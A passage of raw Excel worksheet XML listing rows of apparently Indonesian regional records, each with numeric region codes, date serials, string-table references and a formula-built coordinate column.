      <c r="H4060" t="s">
        <v>26</v>
      </c>
      <c r="I4060" t="s">
        <v>1633</v>
      </c>
      <c r="J4060" t="s">
        <v>13723</v>
      </c>
      <c r="L4060" t="s">
        <v>13724</v>
      </c>
      <c r="M4060">
        <v>3175020001</v>
      </c>
      <c r="N4060">
        <v>3175020</v>
      </c>
      <c r="O4060">
        <v>3175</v>
      </c>
      <c r="P4060">
        <v>31</v>
      </c>
      <c r="Q4060" t="s">
        <v>2227</v>
      </c>
      <c r="R4060" t="s">
        <v>2228</v>
      </c>
      <c r="S4060" t="s">
        <v>547</v>
      </c>
      <c r="T4060" t="s">
        <v>33</v>
      </c>
      <c r="U4060" s="5">
        <v>10683096886</v>
      </c>
      <c r="V4060" s="5" t="s">
        <v>18123</v>
      </c>
      <c r="W4060" s="5">
        <v>-613044732</v>
      </c>
      <c r="X4060" t="s">
        <v>21855</v>
      </c>
      <c r="Y4060" t="str">
        <f t="shared" si="63"/>
        <v>-6.13044732,106.83096886</v>
      </c>
    </row>
    <row r="4061" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4061">
        <v>299000</v>
      </c>
      <c r="B4061" s="1">
        <v>44512</v>
      </c>
      <c r="C4061" t="s">
        <v>13725</v>
      </c>
      <c r="D4061" t="s">
        <v>22</v>
      </c>
      <c r="E4061" t="s">
        <v>23</v>
      </c>
      <c r="F4061" t="s">
        <v>13726</v>
      </c>
      <c r="G4061" t="s">
        <v>13727</v>
      </c>
      <c r="H4061" t="s">
        <v>26</v>
      </c>
      <c r="I4061" t="s">
        <v>1340</v>
      </c>
      <c r="J4061" t="s">
        <v>7399</v>
      </c>
      <c r="L4061" t="s">
        <v>13728</v>
      </c>
      <c r="M4061">
        <v>1406041001</v>
      </c>
      <c r="N4061">
        <v>1406041</v>
      </c>
      <c r="O4061">
        <v>1406</v>
      </c>
      <c r="P4061">
        <v>14</v>
      </c>
      <c r="Q4061" t="s">
        <v>13729</v>
      </c>
      <c r="R4061" t="s">
        <v>13730</v>
      </c>
      <c r="S4061" t="s">
        <v>13731</v>
      </c>
      <c r="T4061" t="s">
        <v>7404</v>
      </c>
      <c r="U4061" s="5">
        <v>10071643353</v>
      </c>
      <c r="V4061" s="5" t="s">
        <v>18124</v>
      </c>
      <c r="W4061" s="5">
        <v>62105870</v>
      </c>
      <c r="X4061" t="s">
        <v>21856</v>
      </c>
      <c r="Y4061" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.62105870,100.71643353</v>
      </c>
    </row>
    <row r="4062" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4062">
        <v>299017</v>
      </c>
      <c r="B4062" s="1">
        <v>44518</v>
      </c>
      <c r="C4062" t="s">
        <v>13732</v>
      </c>
      <c r="D4062" t="s">
        <v>22</v>
      </c>
      <c r="E4062" t="s">
        <v>23</v>
      </c>
      <c r="F4062" t="s">
        <v>13733</v>
      </c>
      <c r="G4062" t="s">
        <v>13734</v>
      </c>
      <c r="H4062" t="s">
        <v>26</v>
      </c>
      <c r="I4062" t="s">
        <v>452</v>
      </c>
      <c r="J4062" t="s">
        <v>7436</v>
      </c>
      <c r="L4062" t="s">
        <v>13735</v>
      </c>
      <c r="M4062">
        <v>6108140008</v>
      </c>
      <c r="N4062">
        <v>6108140</v>
      </c>
      <c r="O4062">
        <v>6108</v>
      </c>
      <c r="P4062">
        <v>61</v>
      </c>
      <c r="Q4062" t="s">
        <v>13736</v>
      </c>
      <c r="R4062" t="s">
        <v>13737</v>
      </c>
      <c r="S4062" t="s">
        <v>7812</v>
      </c>
      <c r="T4062" t="s">
        <v>7441</v>
      </c>
      <c r="U4062" s="5">
        <v>11215319574</v>
      </c>
      <c r="V4062" s="5" t="s">
        <v>18125</v>
      </c>
      <c r="W4062" s="5">
        <v>69021761</v>
      </c>
      <c r="X4062" t="s">
        <v>21857</v>
      </c>
      <c r="Y4062" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> 0.69021761,112.15319574</v>
      </c>
    </row>
    <row r="4063" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4063">
        <v>299117</v>
      </c>
      <c r="B4063" s="1">
        <v>44528</v>
      </c>
      <c r="C4063" t="s">
        <v>13738</v>
      </c>
      <c r="D4063" t="s">
        <v>22</v>
      </c>
      <c r="E4063" t="s">
        <v>23</v>
      </c>
      <c r="F4063" t="s">
        <v>13739</v>
      </c>
      <c r="G4063" t="s">
        <v>13740</v>
      </c>
      <c r="H4063" t="s">
        <v>26</v>
      </c>
      <c r="I4063" t="s">
        <v>3042</v>
      </c>
      <c r="J4063" t="s">
        <v>2608</v>
      </c>
      <c r="M4063">
        <v>3324170018</v>
      </c>
      <c r="N4063">
        <v>3324170</v>
      </c>
      <c r="O4063">
        <v>3324</v>
      </c>
      <c r="P4063">
        <v>33</v>
      </c>
      <c r="Q4063" t="s">
        <v>13741</v>
      </c>
      <c r="R4063" t="s">
        <v>10022</v>
      </c>
      <c r="S4063" t="s">
        <v>7074</v>
      </c>
      <c r="T4063" t="s">
        <v>1134</v>
      </c>
      <c r="U4063" s="5">
        <v>11020351410</v>
      </c>
      <c r="V4063" s="5" t="s">
        <v>18126</v>
      </c>
      <c r="W4063" s="5">
        <v>-691701665</v>
      </c>
      <c r="X4063" t="s">
        <v>21858</v>
      </c>
      <c r="Y4063" t="str">
        <f t="shared" si="63"/>
        <v>-6.91701665,110.20351410</v>
      </c>
    </row>
    <row r="4064" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4064">
        <v>298902</v>
      </c>
      <c r="B4064" s="1">
        <v>44501</v>
      </c>
      <c r="C4064" t="s">
        <v>13742</v>
      </c>
      <c r="D4064" t="s">
        <v>22</v>
      </c>
      <c r="E4064" t="s">
        <v>23</v>
      </c>
      <c r="F4064" t="s">
        <v>13743</v>
      </c>
      <c r="G4064" t="s">
        <v>13744</v>
      </c>
      <c r="H4064" t="s">
        <v>26</v>
      </c>
      <c r="I4064" t="s">
        <v>4436</v>
      </c>
      <c r="J4064" t="s">
        <v>7436</v>
      </c>
      <c r="L4064" t="s">
        <v>13745</v>
      </c>
      <c r="M4064">
        <v>6106090012</v>
      </c>
      <c r="N4064">
        <v>6106090</v>
      </c>
      <c r="O4064">
        <v>6106</v>
      </c>
      <c r="P4064">
        <v>61</v>
      </c>
      <c r="Q4064" t="s">
        <v>13746</v>
      </c>
      <c r="R4064" t="s">
        <v>13747</v>
      </c>
      <c r="S4064" t="s">
        <v>7440</v>
      </c>
      <c r="T4064" t="s">
        <v>7441</v>
      </c>
      <c r="U4064" s="5">
        <v>11046227217</v>
      </c>
      <c r="V4064" s="5" t="s">
        <v>18127</v>
      </c>
      <c r="W4064" s="5">
        <v>-138004547</v>
      </c>
      <c r="X4064" t="s">
        <v>21859</v>
      </c>
      <c r="Y4064" t="str">
        <f t="shared" si="63"/>
        <v>-1.38004547,110.46227217</v>
      </c>
    </row>
    <row r="4065" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4065">
        <v>299080</v>
      </c>
      <c r="B4065" s="1">
        <v>44524</v>
      </c>
      <c r="C4065" t="s">
        <v>13748</v>
      </c>
      <c r="D4065" t="s">
        <v>22</v>
      </c>
      <c r="E4065" t="s">
        <v>23</v>
      </c>
      <c r="F4065" t="s">
        <v>13749</v>
      </c>
      <c r="G4065" t="s">
        <v>13750</v>
      </c>
      <c r="H4065" t="s">
        <v>26</v>
      </c>
      <c r="I4065" t="s">
        <v>1891</v>
      </c>
      <c r="J4065" t="s">
        <v>2622</v>
      </c>
      <c r="L4065" t="s">
        <v>5781</v>
      </c>
      <c r="M4065">
        <v>3524130005</v>
      </c>
      <c r="N4065">
        <v>3524130</v>
      </c>
      <c r="O4065">
        <v>3524</v>
      </c>
      <c r="P4065">
        <v>35</v>
      </c>
      <c r="Q4065" t="s">
        <v>13751</v>
      </c>
      <c r="R4065" t="s">
        <v>8713</v>
      </c>
      <c r="S4065" t="s">
        <v>8713</v>
      </c>
      <c r="T4065" t="s">
        <v>1221</v>
      </c>
      <c r="U4065" s="5">
        <v>11241848230</v>
      </c>
      <c r="V4065" s="5" t="s">
        <v>18128</v>
      </c>
      <c r="W4065" s="5">
        <v>-712368640</v>
      </c>
      <c r="X4065" t="s">
        <v>21860</v>
      </c>
      <c r="Y4065" t="str">
        <f t="shared" si="63"/>
        <v>-7.12368640,112.41848230</v>
      </c>
    </row>
    <row r="4066" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4066">
        <v>299051</v>
      </c>
      <c r="B4066" s="1">
        <v>44523</v>
      </c>
      <c r="C4066" t="s">
        <v>13752</v>
      </c>
      <c r="D4066" t="s">
        <v>22</v>
      </c>
      <c r="E4066" t="s">
        <v>23</v>
      </c>
      <c r="F4066" t="s">
        <v>13753</v>
      </c>
      <c r="G4066" t="s">
        <v>13754</v>
      </c>
      <c r="H4066" t="s">
        <v>26</v>
      </c>
      <c r="I4066" t="s">
        <v>3042</v>
      </c>
      <c r="J4066" t="s">
        <v>6707</v>
      </c>
      <c r="L4066" t="s">
        <v>13755</v>
      </c>
      <c r="M4066">
        <v>5201060014</v>
      </c>
      <c r="N4066">
        <v>5201060</v>
      </c>
      <c r="O4066">
        <v>5201</v>
      </c>
      <c r="P4066">
        <v>52</v>
      </c>
      <c r="Q4066" t="s">
        <v>13756</v>
      </c>
      <c r="R4066" t="s">
        <v>13757</v>
      </c>
      <c r="S4066" t="s">
        <v>13758</v>
      </c>
      <c r="T4066" t="s">
        <v>2154</v>
      </c>
      <c r="U4066" s="5">
        <v>11610313695</v>
      </c>
      <c r="V4066" s="5" t="s">
        <v>18129</v>
      </c>
      <c r="W4066" s="5">
        <v>-853030308</v>
      </c>
      <c r="X4066" t="s">
        <v>21861</v>
      </c>
      <c r="Y4066" t="str">
        <f t="shared" si="63"/>
        <v>-8.53030308,116.10313695</v>
      </c>
    </row>
    <row r="4067" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4067">
        <v>299015</v>
      </c>
      <c r="B4067" s="1">
        <v>44517</v>
      </c>
      <c r="C4067" t="s">
        <v>13759</v>
      </c>
      <c r="D4067" t="s">
        <v>22</v>
      </c>
      <c r="E4067" t="s">
        <v>23</v>
      </c>
      <c r="F4067" t="s">
        <v>13760</v>
      </c>
      <c r="H4067" t="s">
        <v>26</v>
      </c>
      <c r="I4067" t="s">
        <v>7285</v>
      </c>
      <c r="J4067" t="s">
        <v>2622</v>
      </c>
      <c r="L4067" t="s">
        <v>13761</v>
      </c>
      <c r="M4067">
        <v>3519110888</v>
      </c>
      <c r="N4067">
        <v>3519110</v>
      </c>
      <c r="O4067">
        <v>3519</v>
      </c>
      <c r="P4067">
        <v>35</v>
      </c>
      <c r="Q4067" t="s">
        <v>10066</v>
      </c>
      <c r="R4067" t="s">
        <v>8862</v>
      </c>
      <c r="S4067" t="s">
        <v>1220</v>
      </c>
      <c r="T4067" t="s">
        <v>1221</v>
      </c>
      <c r="U4067" s="5">
        <v>11162872553</v>
      </c>
      <c r="V4067" s="5" t="s">
        <v>18130</v>
      </c>
      <c r="W4067" s="5">
        <v>-759630847</v>
      </c>
      <c r="X4067" t="s">
        <v>21862</v>
      </c>
      <c r="Y4067" t="str">
        <f t="shared" si="63"/>
        <v>-7.59630847,111.62872553</v>
      </c>
    </row>
    <row r="4068" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4068">
        <v>299065</v>
      </c>
      <c r="B4068" s="1">
        <v>44524</v>
      </c>
      <c r="C4068" t="s">
        <v>13762</v>
      </c>
      <c r="D4068" t="s">
        <v>22</v>
      </c>
      <c r="E4068" t="s">
        <v>23</v>
      </c>
      <c r="F4068" t="s">
        <v>13763</v>
      </c>
      <c r="G4068" t="s">
        <v>13764</v>
      </c>
      <c r="H4068" t="s">
        <v>9262</v>
      </c>
      <c r="I4068" t="s">
        <v>13765</v>
      </c>
      <c r="J4068" t="s">
        <v>2622</v>
      </c>
      <c r="L4068" t="s">
        <v>13766</v>
      </c>
      <c r="M4068">
        <v>3507090013</v>
      </c>
      <c r="N4068">
        <v>3507090</v>
      </c>
      <c r="O4068">
        <v>3507</v>
      </c>
      <c r="P4068">
        <v>35</v>
      </c>
      <c r="Q4068" t="s">
        <v>9477</v>
      </c>
      <c r="R4068" t="s">
        <v>13767</v>
      </c>
      <c r="S4068" t="s">
        <v>6321</v>
      </c>
      <c r="T4068" t="s">
        <v>1221</v>
      </c>
      <c r="U4068" s="5">
        <v>11292254448</v>
      </c>
      <c r="V4068" s="5" t="s">
        <v>18131</v>
      </c>
      <c r="W4068" s="5">
        <v>-811017372</v>
      </c>
      <c r="X4068" t="s">
        <v>21863</v>
      </c>
      <c r="Y4068" t="str">
        <f t="shared" si="63"/>
        <v>-8.11017372,112.92254448</v>
      </c>
    </row>
    <row r="4069" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4069">
        <v>298931</v>
      </c>
      <c r="B4069" s="1">
        <v>44504</v>
      </c>
      <c r="C4069" t="s">
        <v>13768</v>
      </c>
      <c r="D4069" t="s">
        <v>22</v>
      </c>
      <c r="E4069" t="s">
        <v>23</v>
      </c>
      <c r="F4069" t="s">
        <v>13769</v>
      </c>
      <c r="G4069" t="s">
        <v>13770</v>
      </c>
      <c r="H4069" t="s">
        <v>26</v>
      </c>
      <c r="I4069" t="s">
        <v>1909</v>
      </c>
      <c r="J4069" t="s">
        <v>2622</v>
      </c>
      <c r="L4069" t="s">
        <v>13771</v>
      </c>
      <c r="M4069">
        <v>3573050005</v>
      </c>
      <c r="N4069">
        <v>3573050</v>
      </c>
      <c r="O4069">
        <v>3573</v>
      </c>
      <c r="P4069">
        <v>35</v>
      </c>
      <c r="Q4069" t="s">
        <v>13772</v>
      </c>
      <c r="R4069" t="s">
        <v>9246</v>
      </c>
      <c r="S4069" t="s">
        <v>6321</v>
      </c>
      <c r="T4069" t="s">
        <v>1221</v>
      </c>
      <c r="U4069" s="5">
        <v>11262286663</v>
      </c>
      <c r="V4069" s="5" t="s">
        <v>18132</v>
      </c>
      <c r="W4069" s="5">
        <v>-795283631</v>
      </c>
      <c r="X4069" t="s">
        <v>21864</v>
      </c>
      <c r="Y4069" t="str">
        <f t="shared" si="63"/>
        <v>-7.95283631,112.62286663</v>
      </c>
    </row>
    <row r="4070" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4070">
        <v>298928</v>
      </c>
      <c r="B4070" s="1">
        <v>44504</v>
      </c>
      <c r="C4070" t="s">
        <v>13773</v>
      </c>
      <c r="D4070" t="s">
        <v>22</v>
      </c>
      <c r="E4070" t="s">
        <v>23</v>
      </c>
      <c r="F4070" t="s">
        <v>13774</v>
      </c>
      <c r="G4070" t="s">
        <v>13775</v>
      </c>
      <c r="H4070" t="s">
        <v>7086</v>
      </c>
      <c r="I4070" t="s">
        <v>12222</v>
      </c>
      <c r="J4070" t="s">
        <v>8001</v>
      </c>
      <c r="L4070" t="s">
        <v>13776</v>
      </c>
      <c r="M4070">
        <v>8103140010</v>
      </c>
      <c r="N4070">
        <v>8103140</v>
      </c>
      <c r="O4070">
        <v>8103</v>
      </c>
      <c r="P4070">
        <v>81</v>
      </c>
      <c r="Q4070" t="s">
        <v>13777</v>
      </c>
      <c r="R4070" t="s">
        <v>13778</v>
      </c>
      <c r="S4070" t="s">
        <v>12520</v>
      </c>
      <c r="T4070" t="s">
        <v>8006</v>
      </c>
      <c r="U4070" s="5">
        <v>12918096994</v>
      </c>
      <c r="V4070" s="5" t="s">
        <v>18133</v>
      </c>
      <c r="W4070" s="5">
        <v>-295867895</v>
      </c>
      <c r="X4070" t="s">
        <v>21865</v>
      </c>
      <c r="Y4070" t="str">
        <f t="shared" si="63"/>
        <v>-2.95867895,129.18096994</v>
      </c>
    </row>
    <row r="4071" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4071">
        <v>298918</v>
      </c>
      <c r="B4071" s="1">
        <v>44502</v>
      </c>
      <c r="C4071" t="s">
        <v>13779</v>
      </c>
      <c r="D4071" t="s">
        <v>22</v>
      </c>
      <c r="E4071" t="s">
        <v>23</v>
      </c>
      <c r="F4071" t="s">
        <v>13780</v>
      </c>
      <c r="G4071" t="s">
        <v>13781</v>
      </c>
      <c r="H4071" t="s">
        <v>7978</v>
      </c>
      <c r="I4071" t="s">
        <v>7979</v>
      </c>
      <c r="J4071" t="s">
        <v>6707</v>
      </c>
      <c r="L4071" t="s">
        <v>13782</v>
      </c>
      <c r="M4071">
        <v>5271030006</v>
      </c>
      <c r="N4071">
        <v>5271030</v>
      </c>
      <c r="O4071">
        <v>5271</v>
      </c>
      <c r="P4071">
        <v>52</v>
      </c>
      <c r="Q4071" t="s">
        <v>13783</v>
      </c>
      <c r="R4071" t="s">
        <v>13784</v>
      </c>
      <c r="S4071" t="s">
        <v>2153</v>
      </c>
      <c r="T4071" t="s">
        <v>2154</v>
      </c>
      <c r="U4071" s="5">
        <v>11612966716</v>
      </c>
      <c r="V4071" s="5" t="s">
        <v>18134</v>
      </c>
      <c r="W4071" s="5">
        <v>-858766753</v>
      </c>
      <c r="X4071" t="s">
        <v>21866</v>
      </c>
      <c r="Y4071" t="str">
        <f t="shared" si="63"/>
        <v>-8.58766753,116.12966716</v>
      </c>
    </row>
    <row r="4072" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4072">
        <v>299070</v>
      </c>
      <c r="B4072" s="1">
        <v>44524</v>
      </c>
      <c r="C4072" t="s">
        <v>13785</v>
      </c>
      <c r="D4072" t="s">
        <v>22</v>
      </c>
      <c r="E4072" t="s">
        <v>23</v>
      </c>
      <c r="F4072" t="s">
        <v>13786</v>
      </c>
      <c r="G4072" t="s">
        <v>13787</v>
      </c>
      <c r="H4072" t="s">
        <v>26</v>
      </c>
      <c r="I4072" t="s">
        <v>117</v>
      </c>
      <c r="J4072" t="s">
        <v>6038</v>
      </c>
      <c r="L4072" t="s">
        <v>13788</v>
      </c>
      <c r="M4072">
        <v>1275140001</v>
      </c>
      <c r="N4072">
        <v>1275140</v>
      </c>
      <c r="O4072">
        <v>1275</v>
      </c>
      <c r="P4072">
        <v>12</v>
      </c>
      <c r="Q4072" t="s">
        <v>13789</v>
      </c>
      <c r="R4072" t="s">
        <v>13790</v>
      </c>
      <c r="S4072" t="s">
        <v>7704</v>
      </c>
      <c r="T4072" t="s">
        <v>6043</v>
      </c>
      <c r="U4072" s="5">
        <v>9867952108</v>
      </c>
      <c r="V4072" s="5" t="s">
        <v>18135</v>
      </c>
      <c r="W4072" s="5">
        <v>359100747</v>
      </c>
      <c r="X4072" t="s">
        <v>21867</v>
      </c>
      <c r="Y4072" t="str">
        <f t="shared" si="63"/>
        <v>3.59100747,986.7952108</v>
      </c>
    </row>
    <row r="4073" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4073">
        <v>299050</v>
      </c>
      <c r="B4073" s="1">
        <v>44523</v>
      </c>
      <c r="C4073" t="s">
        <v>13791</v>
      </c>
      <c r="D4073" t="s">
        <v>22</v>
      </c>
      <c r="E4073" t="s">
        <v>23</v>
      </c>
      <c r="F4073" t="s">
        <v>13792</v>
      </c>
      <c r="G4073" t="s">
        <v>13793</v>
      </c>
      <c r="H4073" t="s">
        <v>26</v>
      </c>
      <c r="I4073" t="s">
        <v>137</v>
      </c>
      <c r="J4073" t="s">
        <v>6038</v>
      </c>
      <c r="M4073">
        <v>1275110004</v>
      </c>
      <c r="N4073">
        <v>1275110</v>
      </c>
      <c r="O4073">
        <v>1275</v>
      </c>
      <c r="P4073">
        <v>12</v>
      </c>
      <c r="Q4073" t="s">
        <v>13794</v>
      </c>
      <c r="R4073" t="s">
        <v>7986</v>
      </c>
      <c r="S4073" t="s">
        <v>7704</v>
      </c>
      <c r="T4073" t="s">
        <v>6043</v>
      </c>
      <c r="U4073" s="5">
        <v>9864551067</v>
      </c>
      <c r="V4073" s="5" t="s">
        <v>18136</v>
      </c>
      <c r="W4073" s="5">
        <v>359033824</v>
      </c>
      <c r="X4073" t="s">
        <v>21868</v>
      </c>
      <c r="Y4073" t="str">
        <f t="shared" si="63"/>
        <v>3.59033824,986.4551067</v>
      </c>
    </row>
    <row r="4074" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4074">
        <v>298915</v>
      </c>
      <c r="B4074" s="1">
        <v>44501</v>
      </c>
      <c r="C4074" t="s">
        <v>13795</v>
      </c>
      <c r="D4074" t="s">
        <v>22</v>
      </c>
      <c r="E4074" t="s">
        <v>23</v>
      </c>
      <c r="F4074" t="s">
        <v>13796</v>
      </c>
      <c r="G4074" t="s">
        <v>13797</v>
      </c>
      <c r="H4074" t="s">
        <v>26</v>
      </c>
      <c r="I4074" t="s">
        <v>4672</v>
      </c>
      <c r="J4074" t="s">
        <v>7436</v>
      </c>
      <c r="L4074" t="s">
        <v>13798</v>
      </c>
      <c r="M4074">
        <v>6110020008</v>
      </c>
      <c r="N4074">
        <v>6110020</v>
      </c>
      <c r="O4074">
        <v>6110</v>
      </c>
      <c r="P4074">
        <v>61</v>
      </c>
      <c r="Q4074" t="s">
        <v>13799</v>
      </c>
      <c r="R4074" t="s">
        <v>13800</v>
      </c>
      <c r="S4074" t="s">
        <v>7561</v>
      </c>
      <c r="T4074" t="s">
        <v>7441</v>
      </c>
      <c r="U4074" s="5">
        <v>11154235482</v>
      </c>
      <c r="V4074" s="5" t="s">
        <v>18137</v>
      </c>
      <c r="W4074" s="5">
        <v>-79483105</v>
      </c>
      <c r="X4074" t="s">
        <v>21869</v>
      </c>
      <c r="Y4074" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> -0.79483105,111.54235482</v>
      </c>
    </row>
    <row r="4075" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4075">
        <v>298916</v>
      </c>
      <c r="B4075" s="1">
        <v>44501</v>
      </c>
      <c r="C4075" t="s">
        <v>13801</v>
      </c>
      <c r="D4075" t="s">
        <v>22</v>
      </c>
      <c r="E4075" t="s">
        <v>23</v>
      </c>
      <c r="F4075" t="s">
        <v>13802</v>
      </c>
      <c r="G4075" t="s">
        <v>13803</v>
      </c>
      <c r="H4075" t="s">
        <v>26</v>
      </c>
      <c r="I4075" t="s">
        <v>7487</v>
      </c>
      <c r="J4075" t="s">
        <v>7436</v>
      </c>
      <c r="L4075" t="s">
        <v>13804</v>
      </c>
      <c r="M4075">
        <v>6110020013</v>
      </c>
      <c r="N4075">
        <v>6110020</v>
      </c>
      <c r="O4075">
        <v>6110</v>
      </c>
      <c r="P4075">
        <v>61</v>
      </c>
      <c r="Q4075" t="s">
        <v>13805</v>
      </c>
      <c r="R4075" t="s">
        <v>13800</v>
      </c>
      <c r="S4075" t="s">
        <v>7561</v>
      </c>
      <c r="T4075" t="s">
        <v>7441</v>
      </c>
      <c r="U4075" s="5">
        <v>11153835296</v>
      </c>
      <c r="V4075" s="5" t="s">
        <v>18138</v>
      </c>
      <c r="W4075" s="5">
        <v>-81650833</v>
      </c>
      <c r="X4075" t="s">
        <v>21870</v>
      </c>
      <c r="Y4075" t="str">
        <f t="shared" si="63"/>
        <v xml:space="preserve"> -0.81650833,111.53835296</v>
      </c>
    </row>
    <row r="4076" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4076">
        <v>299116</v>
      </c>
      <c r="B4076" s="1">
        <v>44527</v>
      </c>
      <c r="C4076" t="s">
        <v>13806</v>
      </c>
      <c r="D4076" t="s">
        <v>22</v>
      </c>
      <c r="E4076" t="s">
        <v>23</v>
      </c>
      <c r="F4076" t="s">
        <v>13807</v>
      </c>
      <c r="G4076" t="s">
        <v>13808</v>
      </c>
      <c r="H4076" t="s">
        <v>7978</v>
      </c>
      <c r="I4076" t="s">
        <v>7979</v>
      </c>
      <c r="J4076" t="s">
        <v>2622</v>
      </c>
      <c r="M4076">
        <v>3521110011</v>
      </c>
      <c r="N4076">
        <v>3521110</v>
      </c>
      <c r="O4076">
        <v>3521</v>
      </c>
      <c r="P4076">
        <v>35</v>
      </c>
      <c r="Q4076" t="s">
        <v>13809</v>
      </c>
      <c r="R4076" t="s">
        <v>13810</v>
      </c>
      <c r="S4076" t="s">
        <v>13810</v>
      </c>
      <c r="T4076" t="s">
        <v>1221</v>
      </c>
      <c r="U4076" s="5">
        <v>11144459903</v>
      </c>
      <c r="V4076" s="5" t="s">
        <v>18139</v>
      </c>
      <c r="W4076" s="5">
        <v>-740361130</v>
      </c>
      <c r="X4076" t="s">
        <v>21871</v>
      </c>
      <c r="Y4076" t="str">
        <f t="shared" si="63"/>
        <v>-7.40361130,111.44459903</v>
      </c>
    </row>
    <row r="4077" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4077">
        <v>298905</v>
      </c>
      <c r="B4077" s="1">
        <v>44501</v>
      </c>
      <c r="C4077" t="s">
        <v>13811</v>
      </c>
      <c r="D4077" t="s">
        <v>85</v>
      </c>
      <c r="E4077" t="s">
        <v>23</v>
      </c>
      <c r="F4077" t="s">
        <v>13812</v>
      </c>
      <c r="G4077" t="s">
        <v>13813</v>
      </c>
      <c r="H4077" t="s">
        <v>26</v>
      </c>
      <c r="J4077" t="s">
        <v>6038</v>
      </c>
      <c r="K4077" t="s">
        <v>13814</v>
      </c>
      <c r="L4077" t="s">
        <v>13815</v>
      </c>
      <c r="M4077">
        <v>1277040003</v>
      </c>
      <c r="N4077">
        <v>1277040</v>
      </c>
      <c r="O4077">
        <v>1277</v>
      </c>
      <c r="P4077">
        <v>12</v>
      </c>
      <c r="Q4077" t="s">
        <v>13816</v>
      </c>
      <c r="R4077" t="s">
        <v>13817</v>
      </c>
      <c r="S4077" t="s">
        <v>13818</v>
      </c>
      <c r="T4077" t="s">
        <v>6043</v>
      </c>
      <c r="U4077" s="5">
        <v>9927249490</v>
      </c>
      <c r="V4077" s="5" t="s">
        <v>18140</v>
      </c>
      <c r="W4077" s="5">
        <v>137858370</v>
      </c>
      <c r="X4077" t="s">
        <v>21872</v>
      </c>
      <c r="Y4077" t="str">
        <f t="shared" si="63"/>
        <v>1.37858370,992.7249490</v>
      </c>
    </row>
    <row r="4078" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4078">
        <v>299011</v>
      </c>
      <c r="B4078" s="1">
        <v>44514</v>
      </c>
      <c r="C4078" t="s">
        <v>13819</v>
      </c>
      <c r="D4078" t="s">
        <v>22</v>
      </c>
      <c r="E4078" t="s">
        <v>23</v>
      </c>
      <c r="F4078" t="s">
        <v>13820</v>
      </c>
      <c r="G4078" t="s">
        <v>13821</v>
      </c>
      <c r="H4078" t="s">
        <v>26</v>
      </c>
      <c r="I4078" t="s">
        <v>117</v>
      </c>
      <c r="J4078" t="s">
        <v>7637</v>
      </c>
      <c r="L4078" t="s">
        <v>13822</v>
      </c>
      <c r="M4078">
        <v>6271010005</v>
      </c>
      <c r="N4078">
        <v>6271010</v>
      </c>
      <c r="O4078">
        <v>6271</v>
      </c>
      <c r="P4078">
        <v>62</v>
      </c>
      <c r="Q4078" t="s">
        <v>13823</v>
      </c>
      <c r="R4078" t="s">
        <v>13824</v>
      </c>
      <c r="S4078" t="s">
        <v>13825</v>
      </c>
      <c r="T4078" t="s">
        <v>7642</v>
      </c>
      <c r="U4078" s="5">
        <v>11395629280</v>
      </c>
      <c r="V4078" s="5" t="s">
        <v>18141</v>
      </c>
      <c r="W4078" s="5">
        <v>-223436157</v>
      </c>
      <c r="X4078" t="s">
        <v>21873</v>
      </c>
      <c r="Y4078" t="str">
        <f t="shared" si="63"/>
        <v>-2.23436157,113.95629280</v>
      </c>
    </row>
    <row r="4079" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4079">
        <v>298921</v>
      </c>
      <c r="B4079" s="1">
        <v>44502</v>
      </c>
      <c r="C4079" t="s">
        <v>13826</v>
      </c>
      <c r="D4079" t="s">
        <v>22</v>
      </c>
      <c r="E4079" t="s">
        <v>23</v>
      </c>
      <c r="F4079" t="s">
        <v>13827</v>
      </c>
      <c r="G4079" t="s">
        <v>13828</v>
      </c>
      <c r="H4079" t="s">
        <v>8525</v>
      </c>
      <c r="I4079" t="s">
        <v>13829</v>
      </c>
      <c r="J4079" t="s">
        <v>3013</v>
      </c>
      <c r="L4079" t="s">
        <v>13830</v>
      </c>
      <c r="M4079">
        <v>1672031002</v>
      </c>
      <c r="N4079">
        <v>1672031</v>
      </c>
      <c r="O4079">
        <v>1672</v>
      </c>
      <c r="P4079">
        <v>16</v>
      </c>
      <c r="Q4079" t="s">
        <v>13831</v>
      </c>
      <c r="R4079" t="s">
        <v>13832</v>
      </c>
      <c r="S4079" t="s">
        <v>13833</v>
      </c>
      <c r="T4079" t="s">
        <v>1418</v>
      </c>
      <c r="U4079" s="5">
        <v>10424196010</v>
      </c>
      <c r="V4079" s="5" t="s">
        <v>18142</v>
      </c>
      <c r="W4079" s="5">
        <v>-342820827</v>
      </c>
      <c r="X4079" t="s">
        <v>21874</v>
      </c>
      <c r="Y4079" t="str">
        <f t="shared" si="63"/>
        <v>-3.42820827,104.24196010</v>
      </c>
    </row>
    <row r="4080" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4080">
        <v>299010</v>
      </c>
      <c r="B4080" s="1">
        <v>44514</v>
      </c>
      <c r="C4080" t="s">
        <v>13834</v>
      </c>
      <c r="D4080" t="s">
        <v>22</v>
      </c>
      <c r="E4080" t="s">
        <v>23</v>
      </c>
      <c r="F4080" t="s">
        <v>13835</v>
      </c>
      <c r="G4080" t="s">
        <v>13836</v>
      </c>
      <c r="H4080" t="s">
        <v>26</v>
      </c>
      <c r="I4080" t="s">
        <v>2300</v>
      </c>
      <c r="J4080" t="s">
        <v>7637</v>
      </c>
      <c r="L4080" t="s">
        <v>13837</v>
      </c>
      <c r="M4080">
        <v>6210050001</v>
      </c>
      <c r="N4080">
        <v>6210050</v>
      </c>
